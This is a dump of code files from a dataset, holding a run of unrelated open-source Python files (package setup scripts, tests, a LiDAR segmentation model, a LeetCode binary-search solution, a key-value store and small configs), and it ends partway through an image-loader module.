ext (stringclasses, 9 values) | sha (stringlengths, 40) | content (stringlengths, 3 to 1.04M)
---|---|---
py | b403f8f30443122420958d94acb73da7d187f74d | #!/usr/bin/env python
import os
import sys
if sys.version_info < (3, 6):
print('Error: dbt does not support this version of Python.')
print('Please upgrade to Python 3.6 or higher.')
sys.exit(1)
from setuptools import setup
try:
from setuptools import find_namespace_packages
except ImportError:
# the user has a downlevel version of setuptools.
print('Error: dbt requires setuptools v40.1.0 or higher.')
print('Please upgrade setuptools with "pip install --upgrade setuptools" '
'and try again')
sys.exit(1)
package_name = "dbt-bigquery"
package_version = "0.20.0b1"
description = """The bigquery adapter plugin for dbt (data build tool)"""
this_directory = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_directory, 'README.md')) as f:
long_description = f.read()
setup(
name=package_name,
version=package_version,
description=description,
long_description=long_description,
long_description_content_type='text/markdown',
author="Fishtown Analytics",
author_email="[email protected]",
url="https://github.com/fishtown-analytics/dbt",
packages=find_namespace_packages(include=['dbt', 'dbt.*']),
package_data={
'dbt': [
'include/bigquery/dbt_project.yml',
'include/bigquery/sample_profiles.yml',
'include/bigquery/macros/*.sql',
'include/bigquery/macros/**/*.sql',
]
},
install_requires=[
'dbt-core=={}'.format(package_version),
'protobuf>=3.13.0,<4',
'google-cloud-core>=1.3.0,<2',
'google-cloud-bigquery>=1.25.0,<3',
'google-api-core>=1.16.0,<2',
'googleapis-common-protos>=1.6.0,<2',
'six>=1.14.0',
],
zip_safe=False,
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: Apache Software License',
'Operating System :: Microsoft :: Windows',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
python_requires=">=3.6.2",
)
|
py | b403f90408b697f0d94ea1f3c1caf36659c41ef0 | """
qc0.scope
=========
This module describes query scoping.
"""
from __future__ import annotations
from typing import Dict, Tuple, Callable, Any, Union
from functools import singledispatch
from enum import IntEnum
import sqlalchemy as sa
from .base import Struct
from .syntax import Field
class Cardinality(IntEnum):
ONE = 1
SEQ = 2
def __mul__(self, o: Cardinality):
assert isinstance(o, Cardinality)
return self if self >= o else o
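# Illustrative note (not in the original source): combining cardinalities keeps
# the larger one, e.g. Cardinality.ONE * Cardinality.SEQ is Cardinality.SEQ.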
class Scope(Struct):
pass
class EmptyScope(Scope):
""" There's nowhere to navigate from this point."""
class UnivScope(Scope):
"""
A universe/initial scope.
One can navigate to any db tables from this point.
"""
tables: Dict[str, sa.Table]
class TableScope(Scope):
"""
A table scope.
One can navigate to any of the table columns, fk relationships and reverse
fk relationships.
"""
rel: Any
table: sa.Table
@property
def foreign_keys(self):
return {fk.column.table.name: fk for fk in self.table.foreign_keys}
@property
def rev_foreign_keys(self):
# TODO(andreypopp): this is silly to do on each lookup, we should
# organize this better
return {
fk.parent.table.name: fk
for t in self.table.metadata.tables.values()
for fk in t.foreign_keys
if fk.column.table == self.table
}
def __yaml__(self):
return {"table": str(self.table.name)}
class RecordScope(Scope):
"""
A scope created by selection.
"""
parent: Any
fields: Dict[str, Field]
def __yaml__(self):
return {"parent": self.parent, "fields": list(self.fields)}
class GroupScope(Scope):
"""
A scope created by grouping.
"""
scope: Scope
fields: Dict[str, Field]
rel: Any
def __yaml__(self):
return {"scope": self.scope, "fields": list(self.fields)}
class SyntheticScope(Scope):
"""
Base class for synthetic scopes.
Such scopes are "synthetic" in the sense that there's no "physical" structure
behind them; instead, their values are computed by queries.
"""
def lookup(self, name) -> Tuple[Scope, Callable[[Any], Any]]:
"""
Lookup ``name`` in the scope.
The return value is a tuple of the next scope (it's valid to be
``EmptyScope``) and a function which computes the value in
``sqlalchemy`` terms.
"""
raise NotImplementedError() # pragma: no cover
class JsonScope(SyntheticScope):
"""
Scope for JSON values.
It allows traversing JSON values using PostgreSQL's ``->`` operator.
"""
def lookup(self, name):
return lambda expr, _args: expr[name], sa.dialects.postgresql.JSONB()
class DateScope(SyntheticScope):
"""
Scope for date values.
It destructures any date into ``year``, ``month`` and ``day`` integers.
"""
def lookup(self, name):
if name not in {"year", "month", "day"}:
raise LookupError(name)
return lambda expr, _args: sa.extract(name, expr), sa.Integer()
@singledispatch
def type_scope(_: sa.Type) -> Union[Scope, SyntheticScope]:
""" Describe scope for a specified type. """
return EmptyScope()
@type_scope.register
def Date_scalar_scope(_: sa.Date):
return DateScope()
@type_scope.register
def Json_scalar_scope(_: sa.dialects.postgresql.JSONB):
return JsonScope()
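# Illustrative usage sketch (not part of the original module; assumes a
# SQLAlchemy column expression ``expr`` whose type is ``sa.Date``):
#
#     scope = type_scope(sa.Date())            # -> DateScope()
#     compute, sa_type = scope.lookup("year")  # sa_type is sa.Integer()
#     year_expr = compute(expr, None)          # i.e. sa.extract("year", expr)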
|
py | b403f97597379f78f758cd31af8c56a3a3327352 | #!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Autogenerated by Thrift Compiler (0.9.3)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py:utf8strings
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
|
py | b403fa11c1eeffad1ba6aa74944a496e504ca279 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from os.path import realpath
import pytest
from hydra._internal.config_search_path import ConfigSearchPath, SearchPath
from hydra._internal.utils import compute_search_path_dir
def create_search_path(base_list):
csp = ConfigSearchPath()
csp.config_search_path = [SearchPath(x[0], x[1]) for x in base_list]
return csp
def to_tuples_list(search_path):
return [(x.provider, x.path) for x in search_path.config_search_path]
@pytest.mark.parametrize(
"input_list, reference, expected_idx",
[
([], ("", ""), -1),
([("a", "10")], ("a", None), 0),
([("a", "10"), ("b", "20"), ("a", "30")], ("a", None), 2),
([("a", "10"), ("b", "20"), ("a", "30")], ("b", None), 1),
([("a", "10"), ("b", "20"), ("a", "30")], ("a", "10"), 0),
],
)
def test_find_last_match(input_list, reference, expected_idx):
csp = create_search_path(input_list)
assert csp.find_last_match(SearchPath(reference[0], reference[1])) == expected_idx
@pytest.mark.parametrize(
"input_list, reference, expected_idx",
[
([], ("", ""), -1),
([("a", "10")], ("a", None), 0),
([("a", "10"), ("b", "20"), ("a", "30")], ("a", None), 0),
([("a", "10"), ("b", "20"), ("a", "30")], ("b", None), 1),
([("a", "10"), ("b", "20"), ("a", "30")], ("a", "10"), 0),
],
)
def test_find_first_match(input_list, reference, expected_idx):
csp = create_search_path(input_list)
sp = SearchPath(reference[0], reference[1])
assert csp.find_first_match(sp) == expected_idx
@pytest.mark.parametrize(
"base_list, provider, path, anchor_provider, result_list",
[
# appending to an empty list
([], "foo", "/path", None, [("foo", "/path")]),
# appending to a non empty list
([("f1", "/p1")], "f2", "/p2", None, [("f1", "/p1"), ("f2", "/p2")]),
# appending after an anchor at index 0
(
[("f1", "A"), ("f2", "B")],
"f3",
"B",
SearchPath(None, "A"),
[("f1", "A"), ("f3", "B"), ("f2", "B")],
),
# appending after an anchor at the end of the list
(
[("f1", "A"), ("f2", "B")],
"f3",
"B",
SearchPath(None, "B"),
[("f1", "A"), ("f2", "B"), ("f3", "B")],
),
# appending after a non existent anchor
(
[],
"new_provider",
"/path",
"unregister_provider",
[("new_provider", "/path")],
),
],
)
def test_append(base_list, provider, path, anchor_provider, result_list):
csp = create_search_path(base_list)
csp.append(provider=provider, path=path, anchor=anchor_provider)
assert to_tuples_list(csp) == result_list
@pytest.mark.parametrize(
"base_list, provider, path, anchor_provider, result_list",
[
# prepending to an empty list
([], "foo", "/path", None, [("foo", "/path")]),
# prepending to a full list
(
[("foo", "/path")],
"foo2",
"/path2",
None,
[("foo2", "/path2"), ("foo", "/path")],
),
# prepending in front of an anchor at index 0
(
[("foo", "/path")],
"foo2",
"/path2",
SearchPath("foo", "/path"),
[("foo2", "/path2"), ("foo", "/path")],
),
# prepending in front of an anchor at index 1
(
[("foo", "/path"), ("foo2", "/path2")],
"foo3",
"/path3",
SearchPath("foo2", "/path2"),
[("foo", "/path"), ("foo3", "/path3"), ("foo2", "/path2")],
),
# prepending in front of a none existing anchor results in prepending to the head of the list
([], "foo2", "/path2", "does not exist", [("foo2", "/path2")]),
],
)
def test_prepend(base_list, provider, path, anchor_provider, result_list):
csp = create_search_path(base_list)
csp.prepend(provider=provider, path=path, anchor=anchor_provider)
assert to_tuples_list(csp) == result_list
@pytest.mark.parametrize(
"calling_file, calling_module, config_dir, expected",
[
("foo.py", None, None, realpath("")),
("foo/bar.py", None, None, realpath("foo")),
("foo/bar.py", None, "conf", realpath("foo/conf")),
("foo/bar.py", None, "../conf", realpath("conf")),
("c:/foo/bar.py", None, "conf", realpath("c:/foo/conf")),
("c:/foo/bar.py", None, "../conf", realpath("c:/conf")),
# short module name, keep it to avoid empty module error
(None, "module", None, "pkg://module"),
(None, "package.module", None, "pkg://package"),
(None, "package.module", "conf", "pkg://package/conf"),
# This is an unusual one. this behavior is intentional.
(None, "package.module", "../conf", "pkg://conf"),
(None, "package1.package2.module", "../conf", "pkg://package1/conf"),
# prefer package
("foo", "package1.package2.module", "../conf", "pkg://package1/conf"),
],
)
def test_compute_search_path_dir(calling_file, calling_module, config_dir, expected):
res = compute_search_path_dir(calling_file, calling_module, config_dir)
assert res == expected
|
py | b403fa64c940012e933476d92617e1f28bc44fb1 | from fastapi import FastAPI
from fastapi.testclient import TestClient
app = FastAPI(swagger_ui_oauth2_redirect_url=None)
@app.get("/items/")
async def read_items():
return {"id": "foo"}
client = TestClient(app)
def test_swagger_ui():
response = client.get("/docs")
assert response.status_code == 200
assert response.headers["content-type"] == "text/html; charset=utf-8"
assert "swagger-ui-dist" in response.text
print(client.base_url)
assert "oauth2RedirectUrl" not in response.text
def test_swagger_ui_no_oauth2_redirect():
response = client.get("/docs/oauth2-redirect")
assert response.status_code == 404
def test_response():
response = client.get("/items/")
assert response.json() == {"id": "foo"}
|
py | b403fb1917176b437dbe924a0d22246278ff8e76 | #-*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2019, FPAI
# Copyright (c) 2019, SeriouslyHAO
# Copyright (c) 2019, xcj2019
# Copyright (c) 2019, Leonfirst
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import joblib
import numpy as np
import tensorflow as tf
from squeezeseg.nn_skeleton import ModelSkeleton
class SqueezeSeg(ModelSkeleton):
def __init__(self, mc, gpu_id=0):
with tf.device('/gpu:{}'.format(gpu_id)):
ModelSkeleton.__init__(self, mc)
self._add_forward_graph() # SqueezeNet Model
self._add_output_graph() # pred_prob, pred_cls
self._add_loss_graph() # cls_loss, total_loss
self._add_train_graph() #
self._add_viz_graph() # label_to_show, depth_image_to_show, pred_image_to_show
self._add_summary_ops() #
def _add_forward_graph(self):
"""NN architecture."""
mc = self.mc
if mc.LOAD_PRETRAINED_MODEL:
assert tf.gfile.Exists(mc.PRETRAINED_MODEL_PATH), \
'Cannot find pretrained model at the given path:' \
' {}'.format(mc.PRETRAINED_MODEL_PATH)
self.caffemodel_weight = joblib.load(mc.PRETRAINED_MODEL_PATH)
conv1 = self._conv_layer(
'conv1', self.lidar_input, filters=64, size=3, stride=2,
padding='SAME', freeze=False, xavier=True)
conv1_skip = self._conv_layer(
'conv1_skip', self.lidar_input, filters=64, size=1, stride=1,
padding='SAME', freeze=False, xavier=True)
pool1 = self._pooling_layer(
'pool1', conv1, size=3, stride=2, padding='SAME')
fire2 = self._fire_layer(
'fire2', pool1, s1x1=16, e1x1=64, e3x3=64, freeze=False)
fire3 = self._fire_layer(
'fire3', fire2, s1x1=16, e1x1=64, e3x3=64, freeze=False)
pool3 = self._pooling_layer(
'pool3', fire3, size=3, stride=2, padding='SAME')
fire4 = self._fire_layer(
'fire4', pool3, s1x1=32, e1x1=128, e3x3=128, freeze=False)
fire5 = self._fire_layer(
'fire5', fire4, s1x1=32, e1x1=128, e3x3=128, freeze=False)
pool5 = self._pooling_layer(
'pool5', fire5, size=3, stride=2, padding='SAME')
fire6 = self._fire_layer(
'fire6', pool5, s1x1=48, e1x1=192, e3x3=192, freeze=False)
fire7 = self._fire_layer(
'fire7', fire6, s1x1=48, e1x1=192, e3x3=192, freeze=False)
fire8 = self._fire_layer(
'fire8', fire7, s1x1=64, e1x1=256, e3x3=256, freeze=False)
fire9 = self._fire_layer(
'fire9', fire8, s1x1=64, e1x1=256, e3x3=256, freeze=False)
# Deconvolution
fire10 = self._fire_deconv(
'fire_deconv10', fire9, s1x1=64, e1x1=128, e3x3=128, factors=[1, 2],
stddev=0.1)
fire10_fuse = tf.add(fire10, fire5, name='fire10_fuse')
fire11 = self._fire_deconv(
'fire_deconv11', fire10_fuse, s1x1=32, e1x1=64, e3x3=64, factors=[1, 2],
stddev=0.1)
fire11_fuse = tf.add(fire11, fire3, name='fire11_fuse')
fire12 = self._fire_deconv(
'fire_deconv12', fire11_fuse, s1x1=16, e1x1=32, e3x3=32, factors=[1, 2],
stddev=0.1)
fire12_fuse = tf.add(fire12, conv1, name='fire12_fuse')
fire13 = self._fire_deconv(
'fire_deconv13', fire12_fuse, s1x1=16, e1x1=32, e3x3=32, factors=[1, 2],
stddev=0.1)
fire13_fuse = tf.add(fire13, conv1_skip, name='fire13_fuse')
drop13 = tf.nn.dropout(fire13_fuse, self.keep_prob, name='drop13')
conv14 = self._conv_layer(
'conv14_prob', drop13, filters=mc.NUM_CLASS, size=3, stride=1,
padding='SAME', relu=False, stddev=0.1)
bilateral_filter_weights = self._bilateral_filter_layer(
'bilateral_filter', self.lidar_input[:, :, :, :3], # x, y, z
thetas=[mc.BILATERAL_THETA_A, mc.BILATERAL_THETA_R],
sizes=[mc.LCN_HEIGHT, mc.LCN_WIDTH], stride=1)
self.output_prob = self._recurrent_crf_layer(
'recurrent_crf', conv14, bilateral_filter_weights,
sizes=[mc.LCN_HEIGHT, mc.LCN_WIDTH], num_iterations=mc.RCRF_ITER,
padding='SAME')
def _fire_layer(self, layer_name, inputs, s1x1, e1x1, e3x3, stddev=0.001,
freeze=False):
"""Fire layer constructor.
Args:
layer_name: layer name
inputs: input tensor
s1x1: number of 1x1 filters in squeeze layer.
e1x1: number of 1x1 filters in expand layer.
e3x3: number of 3x3 filters in expand layer.
freeze: if true, do not train parameters in this layer.
Returns:
fire layer operation.
"""
sq1x1 = self._conv_layer(
layer_name+'/squeeze1x1', inputs, filters=s1x1, size=1, stride=1,
padding='SAME', freeze=freeze, stddev=stddev)
ex1x1 = self._conv_layer(
layer_name+'/expand1x1', sq1x1, filters=e1x1, size=1, stride=1,
padding='SAME', freeze=freeze, stddev=stddev)
ex3x3 = self._conv_layer(
layer_name+'/expand3x3', sq1x1, filters=e3x3, size=3, stride=1,
padding='SAME', freeze=freeze, stddev=stddev)
return tf.concat([ex1x1, ex3x3], 3, name=layer_name+'/concat')
def _fire_deconv(self, layer_name, inputs, s1x1, e1x1, e3x3,
factors=[1, 2], freeze=False, stddev=0.001):
"""Fire deconvolution layer constructor.
Args:
layer_name: layer name
inputs: input tensor
s1x1: number of 1x1 filters in squeeze layer.
e1x1: number of 1x1 filters in expand layer.
e3x3: number of 3x3 filters in expand layer.
factors: spatial upsampling factors.
freeze: if true, do not train parameters in this layer.
Returns:
fire layer operation.
"""
assert len(factors) == 2,'factors should be an array of size 2'
ksize_h = factors[0] * 2 - factors[0] % 2
ksize_w = factors[1] * 2 - factors[1] % 2
sq1x1 = self._conv_layer(
layer_name+'/squeeze1x1', inputs, filters=s1x1, size=1, stride=1,
padding='SAME', freeze=freeze, stddev=stddev)
deconv = self._deconv_layer(
layer_name+'/deconv', sq1x1, filters=s1x1, size=[ksize_h, ksize_w],
stride=factors, padding='SAME', init='bilinear')
ex1x1 = self._conv_layer(
layer_name+'/expand1x1', deconv, filters=e1x1, size=1, stride=1,
padding='SAME', freeze=freeze, stddev=stddev)
ex3x3 = self._conv_layer(
layer_name+'/expand3x3', deconv, filters=e3x3, size=3, stride=1,
padding='SAME', freeze=freeze, stddev=stddev)
return tf.concat([ex1x1, ex3x3], 3, name=layer_name+'/concat')
|
py | b403fb1f93df8041c138be84a3f923f47505591d | __source__ = 'https://leetcode.com/problems/h-index-ii/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/h-index-ii.py
# Time: O(logn)
# Space: O(1)
#
# Description: Leetcode # 275. H-Index II
#
# Follow up for H-Index: What if the citations array is sorted in
# ascending order? Could you optimize your algorithm?
#
# Hint:
#
# Expected runtime complexity is in O(log n) and the input is sorted.
#
# Companies
# Facebook
# Related Topics
# Binary Search
# Similar Questions
# H-Index
#
import unittest
class Solution(object):
def hIndex(self, citations):
"""
:type citations: List[int]
:rtype: int
"""
n = len(citations)
left, right = 0, n-1
while left <= right:
mid = (left + right) / 2
if citations[mid] >= n - mid:
right = mid - 1
else:
left = mid + 1
return n - left
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
print Solution().hIndex([0, 1, 3, 5, 6])
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought:
citations[index] >= length(citations) - index
Thought: https://leetcode.com/problems/h-index/tabs/solution
Just binary search, each time check citations[mid]
case 1: citations[mid] == len-mid, then it means there are citations[mid] papers
that have at least citations[mid] citations.
case 2: citations[mid] > len-mid, then the len-mid papers from mid to the end
each have more than len-mid citations, so we should continue searching in the left half
case 3: citations[mid] < len-mid, we should continue searching in the right half
After iteration, it is guaranteed that right+1 is the one we need to find
(i.e. len-(right+1) papers have at least len-(right+1) citations)
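As an illustrative trace (the example array is chosen here, it is not part of the
original problem statement): for citations = [0, 1, 3, 5, 6] and n = 5, the search
visits mid = 2 (citations[2] = 3 >= n - mid = 3, so right becomes 1), then mid = 0
(0 < 5, so left becomes 1), then mid = 1 (1 < 4, so left becomes 2), and stops with
left = 2, returning n - left = 3: exactly the three papers (3, 5, 6) that each have
at least 3 citations.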
1.
# 147ms 8.38%
class Solution {
public int hIndex(int[] citations) {
int result = 0;
for (int i = citations.length - 1; i >= 0; i--) {
result = Math.max(result, Math.min(citations[i], citations.length - i));
}
return result;
}
}
# 8ms 65.84%
class Solution {
public int hIndex(int[] citations) {
for (int i = citations.length - 1; i >= 0; i--) {
if (citations.length - i - 1 >= citations[i]) {
return citations.length - i - 1;
}
}
return citations.length;
}
}
# 6ms 99.08%
class Solution {
public int hIndex(int[] citations) {
if (citations.length == 0) {
return 0;
}
int start = 0;
int end = citations.length - 1;
while (start + 1 < end) {
int mid = start + (end - start) / 2;
if (citations[mid] < citations.length - mid - 1) {
start = mid;
} else if (citations[mid] > citations.length - mid - 1) {
end = mid;
} else {
return citations.length - mid - 1;
}
}
if (citations[end] <= citations.length - end - 1) {
return citations.length - end - 1;
} else if (citations[start] <= citations.length - start - 1) {
return citations.length - start - 1;
} else {
return citations.length;
}
}
}
# 9ms 55.10%
class Solution {
public int hIndex(int[] citations) {
if (citations.length == 0) {
return 0;
}
int start = 0;
int end = citations.length - 1;
int n = citations.length;
while (start <= end) {
int mid = start + (end - start) / 2;
int h = n - mid;
if (citations[mid] == h) {
return h;
} else if (citations[mid] > h) {
end = mid - 1;
} else {
start = mid + 1;
}
}
return n - start;
}
}
3.
I am very sure that a two-branch binary search is more efficient than a three-branch one,
and (low + high) is not a good idea since it may overflow.
In fact, the count/step/first/mid form is the standard way the C++ library implements it,
so I do not think there is a better way to implement this binary search.
# 6ms 99.08%
class Solution {
public int hIndex(int[] citations) {
int len = citations.length;
int first = 0;
int mid;
int count = len;
int step;
while (count > 0) {
step = count / 2;
mid = first + step;
if (citations[mid] < len - mid) {
first = mid + 1;
count -= (step + 1);
}
else {
count = step;
}
}
return len - first;
}
}
''' |
py | b403fc0cd585e2b192dad2aa4812c7d7b2273fe9 | from typing import Any
import aiosqlite
from maize.util.byte_types import hexstr_to_bytes
from maize.util.db_wrapper import DBWrapper
from maize.util.streamable import Streamable
class KeyValStore:
"""
Multipurpose persistent key-value store
"""
db_connection: aiosqlite.Connection
db_wrapper: DBWrapper
@classmethod
async def create(cls, db_wrapper: DBWrapper):
self = cls()
self.db_wrapper = db_wrapper
self.db_connection = db_wrapper.db
await self.db_connection.execute(
("CREATE TABLE IF NOT EXISTS key_val_store(" " key text PRIMARY KEY," " value text)")
)
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS name on key_val_store(key)")
await self.db_connection.commit()
return self
async def _clear_database(self):
cursor = await self.db_connection.execute("DELETE FROM key_val_store")
await cursor.close()
await self.db_connection.commit()
async def get_object(self, key: str, type: Any) -> Any:
"""
Return the stored object, reconstructed from its stored hex-encoded bytes
"""
cursor = await self.db_connection.execute("SELECT * from key_val_store WHERE key=?", (key,))
row = await cursor.fetchone()
await cursor.close()
if row is None:
return None
return type.from_bytes(hexstr_to_bytes(row[1]))
async def set_object(self, key: str, obj: Streamable):
"""
Adds object to key val store
"""
async with self.db_wrapper.lock:
cursor = await self.db_connection.execute(
"INSERT OR REPLACE INTO key_val_store VALUES(?, ?)",
(key, bytes(obj).hex()),
)
await cursor.close()
await self.db_connection.commit()
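# Illustrative usage sketch (not part of the original module; assumes an existing
# DBWrapper instance ``db_wrapper``, a Streamable object ``obj``, and that it runs
# inside an async context):
#
#     store = await KeyValStore.create(db_wrapper)
#     await store.set_object("my_key", obj)
#     restored = await store.get_object("my_key", type(obj))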
|
py | b403fcc500cb37ae89997101e99f088ff61e6ac1 | import sys
from setuptools import setup
from setuptools import find_packages
if sys.version_info[:2] < (3, 6):
raise RuntimeError('cn2an requires Python 3.6 or later')
setup(
name="cn2an",
version="0.5.11",
author="Ailln",
author_email="[email protected]",
url="https://github.com/Ailln/cn2an",
packages=find_packages(),
include_package_data=True,
install_requires=open("./requirements.txt", "r", encoding="utf-8").read().splitlines(),
description="Convert Chinese numerals and Arabic numerals.",
long_description=open("./README.md", "r", encoding="utf-8").read(),
long_description_content_type="text/markdown",
zip_safe=False,
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
]
)
|
py | b403fd12369bf9ac1fa31f1d0e42466e3d20fd71 | if __name__ == "__main__":
import pandas as pd
from key_driver_analysis import relative_importance
df = pd.DataFrame(data={
'age': [40, 50, 60, 10, 20, 30, 7, 80, 90],
'salary': [123, 4423, 56563, 75545, 2345, 2346, 5534, 775, 34345],
'no_of_cars_owned': [1, 3, 4, 2, 1, 3, 5, 3, 2],
'no_of_mobiles_purchased': [10, 3, 5, 65, 34, 6, 21, 76, 9]
})
print(df)
target = 'no_of_mobiles_purchased'
features=set(df.columns.tolist()).difference(set([target]))
print(f'target --> {target}')
print(f'features --> {features}')
rw_df = relative_importance(df,
target=target,
features=features,
verbose=True)
print(rw_df) |
py | b403ff8cc8387935d8ee4e29bf9c022a130c3f47 | # -*- coding: utf-8 -*-
__author__ = "Paul Schifferer <[email protected]>"
"""
"""
from marshmallow import fields
from sweetrpg_library_objects.model.system import System
from sweetrpg_model_core.schema.base import BaseSchema
class SystemSchema(BaseSchema):
model_class = System
game_system = fields.String(required=True) # , load_only=True)
edition = fields.String(required=True) # , load_only=True)
tags = fields.List(fields.Dict(keys=fields.String(required=True), values=fields.String()))
|
py | b403fffd002e5234bdff3319929c5fc1b02fc051 | import torch
from . import Distribution
from .. import util
class Poisson(Distribution):
def __init__(self, rate):
rate = util.to_tensor(rate)
super().__init__(name='Poisson', address_suffix='Poisson', torch_dist=torch.distributions.Poisson(rate))
def __repr__(self):
return 'Poisson(rate: {})'.format(self.rate)
@property
def rate(self):
return self._torch_dist.mean
|
py | b4040020bf71abe53530e89506093f1434b88a87 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import sys
import traceback
import warnings
from pants.base.build_environment import get_buildroot, pants_version
from pants.bin.goal_runner import GoalRunner
class _Exiter(object):
def __init__(self):
# Since we have some exit paths that run via the sys.excepthook,
# symbols we use can become garbage collected before we use them; ie:
# we can find `sys` and `traceback` are `None`. As a result we capture
# all symbols we need here to ensure we function in excepthook context.
# See: http://stackoverflow.com/questions/2572172/referencing-other-modules-in-atexit
self._exit = sys.exit
self._format_tb = traceback.format_tb
self._is_print_backtrace = True
def apply_options(self, options):
self._is_print_backtrace = options.for_global_scope().print_exception_stacktrace
def do_exit(self, result=0, msg=None, out=sys.stderr):
if msg:
print(msg, file=out)
self._exit(result)
def exit_and_fail(self, msg=None):
self.do_exit(result=1, msg=msg)
def unhandled_exception_hook(self, exception_class, exception, tb):
msg = ''
if self._is_print_backtrace:
msg = '\nException caught:\n' + ''.join(self._format_tb(tb))
if str(exception):
msg += '\nException message: {}\n'.format(exception)
else:
msg += '\nNo specific exception message.\n'
# TODO(Jin Feng) Always output the unhandled exception details into a log file.
self.exit_and_fail(msg)
def _run(exiter):
# Place the registration of the unhandled exception hook as early as possible in the code.
sys.excepthook = exiter.unhandled_exception_hook
# We want to present warnings to the user, set this up early to ensure all warnings are seen.
# The "default" action displays a warning for a particular file and line number exactly once.
# See https://docs.python.org/2/library/warnings.html#the-warnings-filter for the complete action
# list.
warnings.simplefilter("default")
# The GoalRunner will setup final logging below in `.setup()`, but span the gap until then.
logging.basicConfig()
# This routes the warnings we enabled above through our loggers instead of straight to stderr raw.
logging.captureWarnings(True)
root_dir = get_buildroot()
if not os.path.exists(root_dir):
exiter.exit_and_fail('PANTS_BUILD_ROOT does not point to a valid path: {}'.format(root_dir))
goal_runner = GoalRunner(root_dir)
goal_runner.setup()
exiter.apply_options(goal_runner.options)
result = goal_runner.run()
exiter.do_exit(result)
def main():
exiter = _Exiter()
try:
_run(exiter)
except KeyboardInterrupt:
exiter.exit_and_fail('Interrupted by user.')
if __name__ == '__main__':
main()
|
py | b40400304cc504ceff96dd2911ae645201469277 | """System policies."""
from .const import CAT_ENTITIES, SUBCAT_ALL, POLICY_READ
ADMIN_POLICY = {CAT_ENTITIES: True}
USER_POLICY = {CAT_ENTITIES: True}
READ_ONLY_POLICY = {CAT_ENTITIES: {SUBCAT_ALL: {POLICY_READ: True}}}
|
py | b404003fb5d530f43c842556f1a72894c3d693a5 | """Intro1ClassWork URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path , include
urlpatterns = [
path('',include('artistRecord.urls')), # route the empty path to the same app so the root URL works without extra handling
path('music/',include('artistRecord.urls')),
path('admin/', admin.site.urls)
]
|
py | b4040091a3a176ca6356f039e363b93aeaeb4e2d | # SPDX-FileCopyrightText: 2018 Scott Shawcroft for Adafruit Industries
# SPDX-FileCopyrightText: Matt Land
# SPDX-FileCopyrightText: Brooke Storm
# SPDX-FileCopyrightText: Sam McGahan
#
# SPDX-License-Identifier: MIT
"""
`adafruit_imageload.pnm.ppm_ascii`
====================================================
Load pixel values (indices or colors) into a bitmap and for an ascii ppm,
return None for palette.
* Author(s): Matt Land, Brooke Storm, Sam McGahan
"""
__version__ = "0.13.2"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_ImageLoad.git"
def load(file, width, height, bitmap=None, palette=None):
"""
